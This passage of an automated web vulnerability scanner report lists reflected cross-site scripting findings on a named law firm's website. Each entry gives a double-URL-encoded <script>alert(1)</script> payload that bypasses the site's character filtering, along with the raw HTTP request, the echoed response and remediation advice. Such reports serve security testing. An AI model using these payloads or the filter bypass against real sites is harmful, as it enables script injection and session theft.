Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_navSearch.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25b68%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5762ef40df was submitted in the REST URL parameter 1. This input was echoed as 25b68"><script>alert(1)</script>c5762ef40df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css25b68%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5762ef40df/_navSearch.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css25b68"><script>alert(1)</script>c5762ef40df/_navSearch.css" value="">
...[SNIP]...

4.137. http://www.wileyrein.com/css/_navSearch.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_navSearch.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd77a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a210746c61 was submitted in the REST URL parameter 2. This input was echoed as fd77a"><script>alert(1)</script>0a210746c61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_navSearch.cssfd77a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a210746c61 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_navSearch.cssfd77a"><script>alert(1)</script>0a210746c61" value="">
...[SNIP]...

4.138. http://www.wileyrein.com/css/_slide.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_slide.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17ef6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4bcf499c51 was submitted in the REST URL parameter 1. This input was echoed as 17ef6"><script>alert(1)</script>b4bcf499c51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css17ef6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4bcf499c51/_slide.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css17ef6"><script>alert(1)</script>b4bcf499c51/_slide.css" value="">
...[SNIP]...

4.139. http://www.wileyrein.com/css/_slide.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_slide.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfc8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf9115355d was submitted in the REST URL parameter 2. This input was echoed as dfc8a"><script>alert(1)</script>df9115355d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_slide.cssdfc8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf9115355d HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_slide.cssdfc8a"><script>alert(1)</script>df9115355d" value="">
...[SNIP]...

4.140. http://www.wileyrein.com/css/main.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51eff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e085a170e769 was submitted in the REST URL parameter 1. This input was echoed as 51eff"><script>alert(1)</script>085a170e769 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css51eff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e085a170e769/main.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css51eff"><script>alert(1)</script>085a170e769/main.css" value="">
...[SNIP]...

4.141. http://www.wileyrein.com/css/main.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb5e2c8ed40b was submitted in the REST URL parameter 2. This input was echoed as 78b32"><script>alert(1)</script>b5e2c8ed40b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/main.css78b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb5e2c8ed40b HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/main.css78b32"><script>alert(1)</script>b5e2c8ed40b" value="">
...[SNIP]...

4.142. http://www.wileyrein.com/css/ui/ui.accordion.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.accordion.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78055%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8d52b987de was submitted in the REST URL parameter 1. This input was echoed as 78055"><script>alert(1)</script>a8d52b987de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css78055%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8d52b987de/ui/ui.accordion.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css78055"><script>alert(1)</script>a8d52b987de/ui/ui.accordion.css" value="">
...[SNIP]...

4.143. http://www.wileyrein.com/css/ui/ui.accordion.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.accordion.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 801be%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35c17289cf6 was submitted in the REST URL parameter 2. This input was echoed as 801be"><script>alert(1)</script>35c17289cf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui801be%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35c17289cf6/ui.accordion.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui801be"><script>alert(1)</script>35c17289cf6/ui.accordion.css" value="">
...[SNIP]...

4.144. http://www.wileyrein.com/css/ui/ui.accordion.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.accordion.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2a82%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb61ee3f3a8a was submitted in the REST URL parameter 3. This input was echoed as a2a82"><script>alert(1)</script>b61ee3f3a8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.accordion.cssa2a82%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb61ee3f3a8a HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.accordion.cssa2a82"><script>alert(1)</script>b61ee3f3a8a" value="">
...[SNIP]...

4.145. http://www.wileyrein.com/css/ui/ui.all.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.all.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 874a6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebba185a7c96 was submitted in the REST URL parameter 1. This input was echoed as 874a6"><script>alert(1)</script>bba185a7c96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css874a6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebba185a7c96/ui/ui.all.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css874a6"><script>alert(1)</script>bba185a7c96/ui/ui.all.css" value="">
...[SNIP]...

4.146. http://www.wileyrein.com/css/ui/ui.all.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.all.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e27d4aec5989 was submitted in the REST URL parameter 2. This input was echoed as 3782d"><script>alert(1)</script>27d4aec5989 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui3782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e27d4aec5989/ui.all.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui3782d"><script>alert(1)</script>27d4aec5989/ui.all.css" value="">
...[SNIP]...

4.147. http://www.wileyrein.com/css/ui/ui.all.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.all.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb48dfbd1665 was submitted in the REST URL parameter 3. This input was echoed as c332a"><script>alert(1)</script>b48dfbd1665 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.all.cssc332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb48dfbd1665 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.all.cssc332a"><script>alert(1)</script>b48dfbd1665" value="">
...[SNIP]...

4.148. http://www.wileyrein.com/css/ui/ui.base.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.base.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aa04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f73509fbde was submitted in the REST URL parameter 1. This input was echoed as 9aa04"><script>alert(1)</script>3f73509fbde in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css9aa04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f73509fbde/ui/ui.base.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css9aa04"><script>alert(1)</script>3f73509fbde/ui/ui.base.css" value="">
...[SNIP]...

4.149. http://www.wileyrein.com/css/ui/ui.base.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.base.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a32e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb7ea1967ea4 was submitted in the REST URL parameter 2. This input was echoed as a32e5"><script>alert(1)</script>b7ea1967ea4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/uia32e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb7ea1967ea4/ui.base.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/uia32e5"><script>alert(1)</script>b7ea1967ea4/ui.base.css" value="">
...[SNIP]...

4.150. http://www.wileyrein.com/css/ui/ui.base.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.base.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4008%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e674bcd1bc31 was submitted in the REST URL parameter 3. This input was echoed as a4008"><script>alert(1)</script>674bcd1bc31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.base.cssa4008%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e674bcd1bc31 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
